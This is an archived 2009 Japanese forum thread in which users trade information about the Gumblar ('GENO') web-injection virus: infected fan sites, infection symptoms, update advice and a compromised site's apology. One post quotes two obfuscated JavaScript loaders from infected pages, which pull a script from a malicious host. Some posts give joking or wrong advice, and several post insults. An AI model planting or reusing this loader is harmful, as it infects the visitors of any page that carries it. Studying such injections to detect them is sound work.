09/05/16 02:59:41
俺がセフレと気持ちよすぎるセクロスしてる最中に何騒いでんだよ?
まだ頑張んなきゃ駄目か?
ちなみにcmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)は勃ちあがった
758:名無しさん@お腹いっぱい。
09/05/16 02:59:41
>>751
ありがとう
かからないようにするのみだな
759:名無しさん@お腹いっぱい。
09/05/16 02:59:41
GENOはもう見ても大丈夫なの?
760:名無しさん@お腹いっぱい。
09/05/16 03:00:34
きんたまみたいにスクショ撮るならニヤニヤできるわな
761:名無しさん@お腹いっぱい。
09/05/16 03:00:35
Reader5とか使ってるやつはアンインストールして、最新を入れろよ。
もしくは何も入れるな。
とっくにサポート対象外なんだよ。
762:名無しさん@お腹いっぱい。
09/05/16 03:00:37
ずいぶん盛況だな
またどっかのサイトが感染したのか?
763:名無しさん@お腹いっぱい。
09/05/16 03:00:52
>>753
今分かってるだけでも
【5月16日1時時点で判明している同人サイト感染状況】
※ここに挙がっていないジャンルも感染が広がっている恐れがあります
エヴァの小説サーチ
ヘタリアの同人サイト
テニミュの同人サイト及びファンサイト
戦国BASARAの同人サイト
リボーンのプチオンリーサイト・同人サイト
おお振りのアンソロサイト
ジョジョの同人サイト
バイオハザードの同人サイト
戦国無双の同人サイト
メガテン(真・女神転生、デビルサマナー、ペルソナ4)の同人サイト
乙女ゲームのVitamin同人サイト
鋼の同人サイト
ガンダム00の同人サイト
幻想水滸伝の同人サイト
忍たま乱太郎の同人サイト
遙かなる時空の中での同人サイト
Fateの同人サイト
サーチも感染してるって報告あるらしいから気をつけろ
764:名無しさん@お腹いっぱい。
09/05/16 03:00:56
カスペ使ってるんだけどavastも一緒にいれても競合しないのか?
765:名無しさん@お腹いっぱい。
09/05/16 03:01:07
botでまーよくここまで
766:名無しさん@お腹いっぱい。
09/05/16 03:01:17
初心者でわからないことだらけだからググって調べようにもネットは自重した方がいいってなると
スレで聞くしかないのかな。あんまり基本的なことだと聞きにくいんだけど
767:名無しさん@お腹いっぱい。
09/05/16 03:01:26
>>759
どう修復したかとか何も発表してないから解決してるか不明だけど
それでもいいなら見れば良いよ
768:名無しさん@お腹いっぱい。
09/05/16 03:01:28
>>755
ヤシって最近聞かないな
769:名無しさん@お腹いっぱい。
09/05/16 03:01:55
すまん、meの場合はどう対処すればいい?
cmd→起動しない、regedit→無事起動、sqlsodbc.chm→存在しない
カスペ→反応なし
なんだけど、ぐぐるがおかしいということも多分ない。
cmdは起動してないけど感染してないと見て大丈夫なのか。
770:名無しさん@お腹いっぱい。
09/05/16 03:02:11
>>766
ぐぐるのが怖い場合もまずはスレ内検索をしてみましょう
771:名無しさん@お腹いっぱい。
09/05/16 03:02:28
2chなかったら気がつかない内に感染してたかもと思うと
>>753
まだまだ報告くる可能性あるから素直に同人板池
772:名無しさん@お腹いっぱい。
09/05/16 03:02:42
>>769
Meは最強だろ
何もしなくてよし
773:名無しさん@お腹いっぱい。
09/05/16 03:02:52
>>769
ケーブル切って投げ捨ててくれ
774:名無しさん@お腹いっぱい。
09/05/16 03:02:55
>>769
そのままの君でいて
775:名無しさん@お腹いっぱい。
09/05/16 03:03:02
>>761
アンインストールして何も入れないほうがいいな。
もしくはアップデートせずに放置
776:名無しさん@お腹いっぱい。
09/05/16 03:03:32
>>764
しないわけねーだろバカ。お前みたいなニワカはカスペなんて使いこなせてないんだろうな。
777:名無しさん@お腹いっぱい。
09/05/16 03:03:36
>>769
Meはcommandでやってみ
778:名無しさん@お腹いっぱい。
09/05/16 03:04:13
5はセキュリティホールあるっぽいから
放置はマズいだろ
779:名無しさん@お腹いっぱい。
09/05/16 03:04:18
>>769
まずMeを窓から投げ捨てるべき
780:名無しさん@お腹いっぱい。
09/05/16 03:05:13
>>769 Windows Me の場合. [スタート]-[プログラム]-[アクセサリ] から [MS-DOS プロンプト] をクリックします。
meはよくわからん
meて
781:名無しさん@お腹いっぱい。
09/05/16 03:05:15
サーチエンジンも感染の可能性っておいおいグーグルも使えないってことか・・・
782:名無しさん@お腹いっぱい。
09/05/16 03:05:18
>>763
こえええええええええええええよ
783:名無しさん@お腹いっぱい。
09/05/16 03:05:20
何だこのスレ…優しい
784:名無しさん@お腹いっぱい。
09/05/16 03:06:03
同人関係で感染ひろがってんだ?
785:名無しさん@お腹いっぱい。
09/05/16 03:06:17
公式で感染してるのは小林だけ?
786:名無しさん@お腹いっぱい。
09/05/16 03:07:02
>>770
もちろんしてるって。でも基本的な用語でもわからないとつまずいちゃうんだよ。
ググれないと辛いものがある
787:名無しさん@お腹いっぱい。
09/05/16 03:07:02
正栄は?
788:名無しさん@お腹いっぱい。
09/05/16 03:07:08
広まるのは同人やってる奴のせいだな
789:名無しさん@お腹いっぱい。
09/05/16 03:07:08
>>737
フラッシュは最新だった
AIRとかSVGviewerとか何のソフトだかいつ落としたかも覚えてないorz
アンインスコしとくわ
790:名無しさん@お腹いっぱい。
09/05/16 03:07:22
>>785
みかか他多数の被害が報告されております
マジでフェーズ6レベル
791:名無しさん@お腹いっぱい。
09/05/16 03:07:33
コミケに集まるあの人数が全員サイト持ちだと考えても恐ろしい数だが、
あれ以上に日本にはオタクがいるわけで…
こわい
792:名無しさん@お腹いっぱい。
09/05/16 03:07:33
感染=OSの再インスコ確定がだるい
793:名無しさん@お腹いっぱい。
09/05/16 03:07:34
>>784
同人は専用スレがたってるから
気づいてる人が多いだけだよ
794:名無しさん@お腹いっぱい。
09/05/16 03:07:53
同人見てるキモヲタなんて感染して痛い目見たほうが良いんじゃね?
795:名無しさん@お腹いっぱい。
09/05/16 03:08:04
>>777
769だけど、commandで黒い窓出た出てきた!ありがとう!
まだかかってないってことだな、これからも気をつける!
796:名無しさん@お腹いっぱい。
09/05/16 03:08:39
>>790
もう危険が危ないのが良く分かった
797:名無しさん@お腹いっぱい。
09/05/16 03:08:49
ごめんなさい
798:名無しさん@お腹いっぱい。
09/05/16 03:09:00
>>786
PC初心者
URLリンク(pc11.2ch.net)
799:名無しさん@お腹いっぱい。
09/05/16 03:09:10
というか身内でサイトいきかうだろ
濃い範囲で展開されてるんだと思う
んでIE使用者も多そう
800:名無しさん@お腹いっぱい。
09/05/16 03:09:18
つい一時間前までは神戸のインフルにびびってたのに今はこっちのが遥かに怖い
801:名無しさん@お腹いっぱい。
09/05/16 03:09:31
>>788
他は気付いてないだけで広がりまくってそう(((゚Д゚;)))ガクガクブルブル
802:名無しさん@お腹いっぱい。
09/05/16 03:09:36
>>778
じゃあアンインストールでいいな。
pdfなんぞ見れんでも困らんし。
803:名無しさん@お腹いっぱい。
09/05/16 03:09:48
NTTはやべえだろ…ええー感染してんだ
804:名無しさん@お腹いっぱい。
09/05/16 03:10:24
え、NTT感染してんのかよ
805:名無しさん@お腹いっぱい。
09/05/16 03:10:29
>>791
>全員サイト持ち
ないないないn
806:名無しさん@お腹いっぱい。
09/05/16 03:10:35
普通のサイト開いたら「JS:Redirector-G [Trj]」だって警告でた
4月の半ばだった希ガス
これってGENOかな
807:名無しさん@お腹いっぱい。
09/05/16 03:10:57
NTTじゃねーだろ
808:名無しさん@お腹いっぱい。
09/05/16 03:10:59
>>795
ファイル名変えたら実行できたって報告があったから
それはあんまり意味がないかもしれない
Meを使ってる時点で終わってる
809:名無しさん@お腹いっぱい。
09/05/16 03:11:21
>>798
活用するけどさ、聞きまくるわけにもいかないだろ
初心者は本当に基本的なことでもわからないけど、それを教えてる方はしんどいだろ
810:名無しさん@お腹いっぱい。
09/05/16 03:11:41
>>806
当たりです
三月下旬以降から拡大中だよ
811:名無しさん@お腹いっぱい。
09/05/16 03:12:01
さすがに人が入れ替わってきたかな
まとめwiki置いといたほうがよさそうだな
GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
812:名無しさん@お腹いっぱい。
09/05/16 03:12:08
>>803
>>804
>>142
813:名無しさん@お腹いっぱい。
09/05/16 03:12:44
>>810
3月下旬発症てとこまで豚と一緒じゃないのよ
こわっ
814:名無しさん@お腹いっぱい。
09/05/16 03:13:30
>>732 なるほど
恐らくこれだな
スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト
スクリプト関係には詳しくないからわからないが
素人目でもこれはくさいな
815:名無しさん@お腹いっぱい。
09/05/16 03:13:44
>>810
まじか。avastが開く前に止めてくれたから助かった
「homepage3.nifty~(伏せとく)」の個人サイトだった
816:名無しさん@お腹いっぱい。
09/05/16 03:13:52
>>806 ぐぐったらこんなんでました URLリンク(detail.chiebukuro.yahoo.co.jp)
817:名無しさん@お腹いっぱい。
09/05/16 03:14:15
眠れねえ・・・
818:名無しさん@お腹いっぱい。
09/05/16 03:14:47
GENOはトロイとして検出されるの?
819:名無しさん@お腹いっぱい。
09/05/16 03:14:48
眠気が覚めたよもう
820:名無しさん@お腹いっぱい。
09/05/16 03:15:10
知恵袋でさえ怖くなってきたおいらチキンすぎる
821:名無しさん@お腹いっぱい。
09/05/16 03:15:24
もう無理だよ。最終的にネットやってる奴は6割感染するな。
822:名無しさん@お腹いっぱい。
09/05/16 03:15:44
怖くて2ちゃん以外開けない
823:名無しさん@お腹いっぱい。
09/05/16 03:15:54
本っ当にここで聞きづらい初心者は
同人板のスレを最初から見たほうが判りやすいと思う
まだ読みもせず質問するのがいるから、拡張子の表示から説明してるレスもある
824:名無しさん@お腹いっぱい。
09/05/16 03:15:55
こんだけ広まってるなら
落ち着くのは何時になるのやら…
825:名無しさん@お腹いっぱい。
09/05/16 03:15:58
そのまま貼り付けたらログから検出反応出るがな(´・ω・`)
826:名無しさん@お腹いっぱい。
09/05/16 03:16:15
>>816
JavaとJavaScriptを本気で混同してらっしゃる人がベストアンサーとな・・・?
827:名無しさん@お腹いっぱい。
09/05/16 03:16:56
rss readerでブログ読んでても、
対象サイトが感染していると伝染する?
828:名無しさん@お腹いっぱい。
09/05/16 03:17:29
同人から来た奴はスルーしろ。こいつらは感染したって自業自得だろ。
829:名無しさん@お腹いっぱい。
09/05/16 03:17:30
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
830:名無しさん@お腹いっぱい。
09/05/16 03:18:06
同人板のスレ眺めてきた
あれ初心者板より優しいんじゃないのかw
831:名無しさん@お腹いっぱい。
09/05/16 03:18:14
首相がオタクのこんな国じゃ
832:名無しさん@お腹いっぱい。
09/05/16 03:18:18
今頃になって慌ててこのスレ読んでる奴は手遅れ
833:名無しさん@お腹いっぱい。
09/05/16 03:18:39
とりあえず全部最新版にしたー!
834:名無しさん@お腹いっぱい。
09/05/16 03:18:57
>>830
ここより親切だなww
835:名無しさん@お腹いっぱい。
09/05/16 03:19:01
>>827
それ俺も気になった
836:名無しさん@お腹いっぱい。
09/05/16 03:20:16
これだけ広がりやすいウイルスで感染してるかもしれない奴を放置とか危なすぎるだろ
837:名無しさん@お腹いっぱい。
09/05/16 03:20:17
感染してるサイトまとめろよ
838:名無しさん@お腹いっぱい。
09/05/16 03:20:18
同人板小学生が多いイメージになった
839:名無しさん@お腹いっぱい。
09/05/16 03:20:23
>>823
決め付けるなって、調べない初心者もいるけど
840:357
09/05/16 03:20:55
>>785
めっちゃ沢山感染しているし、発表して謝罪しているサイトはまだマシ。
俺はとっくに知人には連絡して当分ネットはするなって言っておいた。
ME使ってるやつなんて、とっくに何かのウィルスに感染していると考えた方がいい。
cmd起動とか関係ないレベルだから。
>>809
しんどいのは、初心者が既出の情報にも目を通さない愚かものばかりだからさ。
一度の教えで済むならいいが、実際はわらわらと、すき放題に群がるだろ。
841:名無しさん@お腹いっぱい。
09/05/16 03:20:59
>>780もありがとう
一応kerioも入れてIEOEも使わずにやってきたけど、
Meはそんなに終わってるのか?
842:名無しさん@お腹いっぱい。
09/05/16 03:21:24
やっぱIDでる板はいいなぁーん
843:名無しさん@お腹いっぱい。
09/05/16 03:21:28
>>838
ガキっつうか無知と女が多いから
無知に女が優しく教ちゃうんだろ
844:名無しさん@お腹いっぱい。
09/05/16 03:21:32
感染してるのって・・・
>>523
>>763
この他にもあるの?
845:名無しさん@お腹いっぱい。
09/05/16 03:21:40
>>827
ブログはスクリプトをうめこめないんじゃね
個人サイトの適当生成RSSなら生成方法によるかも
確実に安全とはいいきれないとおもう
846:名無しさん@お腹いっぱい。
09/05/16 03:22:12
ブログとかmixiとかやってる人はウイルスのことちょっと書いといてもいいかもね
知らない人のほうがまだまだ多いだろうし
847:名無しさん@お腹いっぱい。
09/05/16 03:23:01
Meを極限まで安定化させるスレ・Me総合スレ Part 16
スレリンク(win板)l50
に行くと幸せになれるかもしれない
848:名無しさん@お腹いっぱい。
09/05/16 03:23:15
連絡先が書いてないサイトはどうしたらいい?
もう直ってたから連絡する必要はないんだろうけど
849:名無しさん@お腹いっぱい。
09/05/16 03:23:36
初心者なんかスルーしろよ。感染の確認方法すらまともに実行できねぇ上に、同じ質問何度も何度も・・・。
さっさとクリーンインストールしろっての
850:名無しさん@お腹いっぱい。
09/05/16 03:23:42
多分同人のやつらはまだましだよ
一般人の方がさらに知識ないし危機感ないから
851:名無しさん@お腹いっぱい。
09/05/16 03:23:50
>>838
放っておくと自分も被害受けるから
852:名無しさん@お腹いっぱい。
09/05/16 03:24:01
オタクになるのって思春期の中高生がたしかに多そうだな
そりゃこわい
853:名無しさん@お腹いっぱい。
09/05/16 03:24:20
>>847
サンキュ、見て勉強してくる
854:名無しさん@お腹いっぱい。
09/05/16 03:24:42
同人板に行けばこんな俺でも女に優しくして貰えるんですね!
しかもタダで!
855:名無しさん@お腹いっぱい。
09/05/16 03:25:22
>>853
どっちみちMeはMSがサポートを打ち切ってるから
脆弱性があってもほったらかしになってるんだよ
だからすごくあぶないの
サポート打ち切られてるからセキュリティ製品もサポートしてないの
856:名無しさん@お腹いっぱい。
09/05/16 03:25:36
>>845
fc2ブログとか余裕でScript埋め込めるよ
自分でだけど
857:名無しさん@お腹いっぱい。
09/05/16 03:25:42
URLリンク(www.mse.co.jp)
ここで連絡先調べてプギャーする
858:名無しさん@お腹いっぱい。
09/05/16 03:25:44
>>854
ほどほどにな
859:名無しさん@お腹いっぱい。
09/05/16 03:26:16
>>854
おまえの先輩の成れの果て
スレリンク(doujin板)
860:名無しさん@お腹いっぱい。
09/05/16 03:26:17
これ最終的に何で対応すんだろ
861:名無しさん@お腹いっぱい。
09/05/16 03:26:43
>>854
お前が21歳以上なら801板に池。
「vipから来ました」という魔法の呪文を唱えると
お姉さまがとってもやさしくしてくれるぞ。
862:名無しさん@お腹いっぱい。
09/05/16 03:26:55
>>854
調べてもわからないこと聞けよ
863:名無しさん@お腹いっぱい。
09/05/16 03:27:10
>>844
前スレの>>432のが感染者数だとするとこんだけ
432 名無しさん@お腹いっぱい。 sage 2009/05/14(木) 14:25:33
google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日) 623 個
2009/05/06(水) 1108 個
2009/05/07(木) 1951 個
2009/05/08(金) 1437 個
2009/05/09(土) 648 個
2009/05/14(木) 24 個のドメインを感染させています。
864:名無しさん@お腹いっぱい。
09/05/16 03:27:20
>>856
埋め込まれてRSSにそのまま配信されたら詰むな
865:名無しさん@お腹いっぱい。
09/05/16 03:27:38
オタクって男のほうが多いんじゃないの?
どうでもいいけど
866:名無しさん@お腹いっぱい。
09/05/16 03:27:52
>>864
わああああ
867:名無しさん@お腹いっぱい。
09/05/16 03:28:22
同人板とおたく板は一緒じゃねえのか
868:名無しさん@お腹いっぱい。
09/05/16 03:28:39
>>863
こりゃあ、エロサイト漁ってるガキはあっという間に感染して終了だな
869:名無しさん@お腹いっぱい。
09/05/16 03:29:22
ブログはキーロガー埋め込めるからそっちでも危ない
870:名無しさん@お腹いっぱい。
09/05/16 03:29:43
/(^o^)\
871:名無しさん@お腹いっぱい。
09/05/16 03:30:23
>>865
書き手は女の方が多い
872:名無しさん@お腹いっぱい。
09/05/16 03:30:39
>>863
なんという感染力…
873:名無しさん@お腹いっぱい。
09/05/16 03:31:17
>>869
中国韓国台湾のブログは最近ひどいことになってるね
各MMORPGでアカウントハック祭り
genoとは関係ないけど
874:名無しさん@お腹いっぱい。
09/05/16 03:31:20
>>815
それって上に書いてある奴じゃね
875:名無しさん@お腹いっぱい。
09/05/16 03:31:24
感染してないけど、今ftp立ち上げるの怖いから自鯖設置の
ブログだけ更新しようと思ってたけどそれもやばいのかな
876:名無しさん@お腹いっぱい。
09/05/16 03:32:33
踏むとふつーにマルウェア感染するっていう認識>*.cn
877:名無しさん@お腹いっぱい。
09/05/16 03:32:49
>>512
国交省の地方整備局が1度やられてるんだがなあ
URLリンク(www.cbr.mlit.go.jp)
ほんとあまりニュースにならないね
それこそmixiとかようつべとかネットバンクとかが改竄されないと危機感持たんのかorz
878:名無しさん@お腹いっぱい。
09/05/16 03:33:10
何もしないで素直に専ブラで2chだけ見てるのが一番だな
879:名無しさん@お腹いっぱい。
09/05/16 03:33:47
>>875
clientとserverでは別物のウイルスだと思うよ
serverはftpハック
clientはハックserverのjs、つまりGENOウイルス
880:名無しさん@お腹いっぱい。
09/05/16 03:34:07
>>877
マスゴミなんてそんなもん
被害が拡大してやっとぼちぼち取り上げ始める
881:名無しさん@お腹いっぱい。
09/05/16 03:34:23
>>863
難読化されたコードが埋め込まれているサイトはカウントされていないよね?
882:名無しさん@お腹いっぱい。
09/05/16 03:34:24
>>77のこれ何?
883:名無しさん@お腹いっぱい。
09/05/16 03:35:20
フラッシュープレーやーは何もしなくておk?
884:名無しさん@お腹いっぱい。
09/05/16 03:35:28
なんだよお前ら
うちの職場普通にME使いだぞ
まいったか
885:名無しさん@お腹いっぱい。
09/05/16 03:35:42
>>883
ログ全部読め
886:名無しさん@お腹いっぱい。
09/05/16 03:36:18
>>883
最新にしろ
887:名無しさん@お腹いっぱい。
09/05/16 03:36:21
>>882
ブロックすべきアドレスのリスト
888:名無しさん@お腹いっぱい。
09/05/16 03:37:04
>>882
PeerGuardian2用ブロックリスト
889:名無しさん@お腹いっぱい。
09/05/16 03:37:18
まあ人命に関わる豚インフルと仮想空間じゃ比べるとねえ
クレカの番号抜かれたら死ねるけど
890:名無しさん@お腹いっぱい。
09/05/16 03:37:31
>>731
Vistaだと、変なところ(\Windows\help\imu\のサブフォルダ内)にsqlsodbc.chmあるよ
891:名無しさん@お腹いっぱい。
09/05/16 03:37:36
>>887
なるほど
ありがとう先輩
892:名無しさん@お腹いっぱい。
09/05/16 03:37:57
>>889
引きこもれば豚インフレは大丈夫
だが、こっちは引きこもってても危険
893:名無しさん@お腹いっぱい。
09/05/16 03:38:07
>>884
genoにやられなくても他のウイルスにやられますがな
894:名無しさん@お腹いっぱい。
09/05/16 03:38:09
>>889
オンラインで使ってたら余裕で抜かれると思うよ
895:名無しさん@お腹いっぱい。
09/05/16 03:38:22
>>888
ありがとう
896:名無しさん@お腹いっぱい。
09/05/16 03:38:49
>>884
踏み台にされてますってそのうち警察がくるかもな
897:名無しさん@お腹いっぱい。
09/05/16 03:39:31
次スレはこのスレを叩き台にしてテンプレある程度纏めないといけないな
898:名無しさん@お腹いっぱい。
09/05/16 03:40:19
インフル怖いなぁ外出もできやしないよ
↓
ネサフでもするかー
アウトー
899:名無しさん@お腹いっぱい。
09/05/16 03:40:46
>>892
ネットしなきゃいいの
900:名無しさん@お腹いっぱい。
09/05/16 03:41:09
>>899
死んでしまうよ
901:名無しさん@お腹いっぱい。
09/05/16 03:42:39
2ちゃんだけしてればいいんだよ
902:357
09/05/16 03:42:40
とりあえず、このスレの
>>1-15
までは読んで実行しないと、お話にならない。
>>4は無視。
以下、感染した、とあるサイトのお詫び文(一部、俺が改変)と対処法(あくまで今のところ、明日になれば通用しないかも)
サイトをブラウザーでご覧いただいた方にウィルス感染の恐れがあることが判明しました。
弊社サイトをご利用いただいている皆様には大変ご迷惑をおかけしましたことをお詫び申し上げます。
現在は、改ざんされたページの修正を完了しており、ご覧いただいてもウィルス感染の恐れはございません。サイトの安全管理には万全を期して参りますので今後ともよろしくお願い申し上げます。
※当該サイトには個人情報は保存されておりませんので流出の恐れはございません。
※Windows Vista以降、Macは、感染の恐れはございません。
感染するシステム
Windows XP以前のOS(XP / 2000など)で、Acrobat Reader、Adobe Readerのバージョンが古い場合
(■俺注:ME以前は論外 古いとは、5/12に最新になった9.1.1よりも前の9.1とかをさす。 reader7も8も5/12以降にアップしていなきゃNG)
903:名無しさん@お腹いっぱい。
09/05/16 03:42:43
>>900
死ねばいいの
904:名無しさん@お腹いっぱい。
09/05/16 03:43:56
もはやバージョンアップのためにネットにつなぐことすら怖い
905:357
09/05/16 03:43:59
続き。
Web ページの表示に使われるhtmlファイルの一部に第三者のサイトより攻撃プログラムをダウンロードするJava Scriptが埋め込まれました。この攻撃プログラムは、Acrobat Reader、Adobe Readerの脆弱性を利用してパソコンの中にスパイプログラムを送り込みます。
Windows XP、2000とAcrobat Reader、Adobe Readerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
(■俺注:5/12より前の古いバージョンを使っていれば、基本的に感染するが、運良く初期設定を変更していてJavaScriptを切っていれば感染しない 切る方法は>>3 だが、既に感染していれば手遅れ 感染していない人も切る事を推奨)
感染した場合、次の様な問題が発生します(以下はあくまで症状の一例。他は>>1)。
・ヘルプファイルの改ざん
C:\Windows\System32のsqlsodbc.chmファイルを改ざんします。(スパイプログラムのデータ置き場に利用されています。)
ファイルサイズが1000バイト程度の場合は、改ざんされています。
・コマンドプロンプトが起動できなくなる
コマンドプロンプトを起動するとエクスプローラーが再起動します。また、この影響でレジストリエディタが起動できなくなります。
続く。
906:名無しさん@お腹いっぱい。
09/05/16 03:44:12
感染していたサイトがなんの謝罪もなく復活してる件について
907:名無しさん@お腹いっぱい。
09/05/16 03:44:44
avastお前だけが頼りだ
908:名無しさん@お腹いっぱい。
09/05/16 03:45:53
2ちゃんしか見てないのにAdobeReaderが勝手に起動した
もうこわいやだもう泣きそう
909:名無しさん@お腹いっぱい。
09/05/16 03:46:08
同人板と協力したらどうだ
910:名無しさん@お腹いっぱい。
09/05/16 03:46:57
>>908
マジで?
911:名無しさん@お腹いっぱい。
09/05/16 03:47:07
>>910
マジ
912:名無しさん@お腹いっぱい。
09/05/16 03:47:23
だからavast入っててもヒューリスティック最大にしなきゃ意味ないって
913:名無しさん@お腹いっぱい。
09/05/16 03:47:26
>>908
単なる自動アップデートとかじゃねぇのか?
914:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>911
ブラウザ何?
専ブラじゃないだろ
915:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>908
2ちゃんだけしか見てなくてそれは無い。
916:名無しさん@お腹いっぱい。
09/05/16 03:47:54
>>908
お前IEで見てるだろ
917:名無しさん@お腹いっぱい。
09/05/16 03:48:15
>>914
jane…
918:名無しさん@お腹いっぱい。
09/05/16 03:48:16
すみませーん
股がスルメ臭いです
どうすれば?
919:名無しさん@お腹いっぱい。
09/05/16 03:48:25
>>908
2chからリンクしてるサイトは2chじゃないとこもあるぞ
920:名無しさん@お腹いっぱい。
09/05/16 03:49:45
>>917
じゃあリンク踏んでないか?
専ブラでありえないわー
921:名無しさん@お腹いっぱい。
09/05/16 03:50:26
スレ速度の推移
URLリンク(ranking.sitepedia.jp)
922:名無しさん@お腹いっぱい。
09/05/16 03:50:36
>>880
>>241が事実なら、そこが対策できたことを確認し、
ついでに自社内をチェックし終えてから、やっと報道する予感。
>>908
単に、自動更新しにいった→UPDATEモジュール拾ったから起動…だといいな
923:名無しさん@お腹いっぱい。
09/05/16 03:51:28
誰か安眠をくれ…
924:名無しさん@お腹いっぱい。
09/05/16 03:51:55
少し前には、広告に紛れてた事が無かったっけか
flashを確認制にしたいんだけど、noscript使うしかないのかな
このくらい、標準で設定用意しておいてくれと思うんだが
925:名無しさん@お腹いっぱい。
09/05/16 03:52:25
阿呆な質問するけど誰か教えてくれ
感染してるサイトにこっちからアクセスすると
自分も感染するというのは分かったけど
じゃあ逆に
感染してる奴が感染してないサイトにアクセスしたらどうなるの?
926:名無しさん@お腹いっぱい。
09/05/16 03:52:35
>>923
ネット接続切れば安眠できるよ
927:名無しさん@お腹いっぱい。
09/05/16 03:52:58
Adobe Flash Player
Adobe Acrobat Reader
この2つアンインストールすりゃ絶対に感染する事ないんでしょ?
928:名無しさん@お腹いっぱい。
09/05/16 03:53:30
絶対はないからこれからもドキドキしててね
929:名無しさん@お腹いっぱい。
09/05/16 03:53:39
>>921
深夜に伸び続けてるのが凄いなw
930:名無しさん@お腹いっぱい。
09/05/16 03:53:44
>>925
別になにも起きないんじゃないかな
931:名無しさん@お腹いっぱい。
09/05/16 03:53:56
.が-にかわっているだけでほぼ>>814のコードなんだけど
これって今回のウィルス?
932:名無しさん@お腹いっぱい。
09/05/16 03:54:18
>>927
フラッシュプレイヤーが使えないと不便じゃないか?
933:名無しさん@お腹いっぱい。
09/05/16 03:54:35
>>925
流石にそれでサイトに感染したりしたらもうネットは終わり
934:357
09/05/16 03:54:44
>>3 のステップ1をやらずに、>>1 の症状のどれか一つでもある人は、
感染を疑った方がいい。
感染後の対処法も>>902のサイトに書かれているけど、
一度感染したら最後、勝手にどんどんアップデートするマルウェアなので、その対処法で十分かは疑わしい。
>>5のようなこと(ほとんどのセキュリティーソフトが機能しない状態)になってるのも同じ理由。
したがって、クリーンインストールしなおしが冗談抜きで、唯一の現実的な選択。
お詫び文の中にもこのような記述がある↓
このお知らせを作成した2009/5/14時点では、各社セキュリティーソフトでは検出されませんが、
セキュリティーソフトの検出パターンに反映されましたら、検査を行ってください。
下記リンク先のブラウザーから実行できるオンラインスキャン(無料)をご利用いただけます。
トレンドマイクロ社オンラインスキャンを開きます。
URLリンク(www.trendmicro.co.jp)
つづく。
935:名無しさん@お腹いっぱい。
09/05/16 03:55:06
>>927
ネットに繋がっている限り感染する可能性があることを忘れるな
だったら「絶対」大丈夫じゃない?
936:名無しさん@お腹いっぱい。
09/05/16 03:55:23
>>927
ウイルスをディスアセンブルして挙動を確認しない限り絶対はない。
解析したとしても亜種に限っては絶対とは言えない。
これは現行判断のすべての材料に及ぶ。
既に亜種にはsqlsodbc.chmを改変しない物もある。当然avastなどのソフトに引っかからない物もあるだろう
937:名無しさん@お腹いっぱい。
09/05/16 03:56:04
Vistaは感染しないのか?
昨日からIEが落ちまくっててOpera使ってるんだけどウイルス関係ないのかな
ちなみにソフトはマカフィー
938:名無しさん@お腹いっぱい。
09/05/16 03:56:46
マカフィーなんてさっさと投げ捨てろ
939:名無しさん@お腹いっぱい。
09/05/16 03:57:28
「FTPで接続」した場合はログインIDとパスワードを盗まれ
今後そのFTPサイト内が改竄される可能性がある
940:名無しさん@お腹いっぱい。
09/05/16 03:57:34
マカフィーのメール監視が重くて泣いた5年前
941:名無しさん@お腹いっぱい。
09/05/16 03:57:38
■質問する前にまず>>1からログ全部読め
■「こうすれば大丈夫!安心!」なんて対策は今のところ無い。
942:名無しさん@お腹いっぱい。
09/05/16 03:57:41
とりあえず歯磨いて顔洗ってこよう…
943:名無しさん@お腹いっぱい。
